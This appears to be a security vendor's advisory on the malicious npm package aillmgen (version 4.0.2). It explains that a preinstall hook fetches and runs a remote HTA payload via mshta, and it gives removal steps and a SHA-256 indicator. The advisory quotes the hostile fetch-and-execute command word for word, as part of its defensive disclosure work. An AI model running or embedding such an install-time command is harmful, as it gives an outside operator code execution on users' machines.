Your RSA-2048 keys break in 2030. Find every one of them before attackers do.
Malicious package

aillmgennpm

Malicious code in aillmgen (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5927
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall aillmgen

What this malware does

On npm install, the package's preinstall hook (preinstall.js) runs exec('cmd /c "mshta http://fixars.top"'), invoking the Windows mshta.exe binary to fetch and execute an HTA payload from http://fixars.top with the installer's privileges. mshta is a well-known living-off-the-land binary that executes arbitrary HTA/JScript/VBScript content directly from a remote URL, giving the operator of fixars.top remote code execution on any Windows machine that installs this package. The remote endpoint is plain HTTP and attacker-mutable, and the behavior is unrelated to the package's stated LLM-client purpose (the library code references an EasyLLMClient targeting api.easyllm.ai while the package itself is published under the unrelated name aillmgen with empty author and description metadata). The combination of install-time RCE, plaintext attacker-controlled fetch-and-execute, impersonation of an LLM-client utility, and placeholder publisher metadata is a supply-chain dropper.

Malicious versions

1 flagged
4.0.2

Indicators of compromise (SHA-256)

5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341

Frequently asked questions

No. aillmgen on npm has been identified as a malicious package (version 4.0.2 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006837

References

Credits

  • Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection
aillmgen (npm) malicious package — MAL-2026-5927 | O3 Security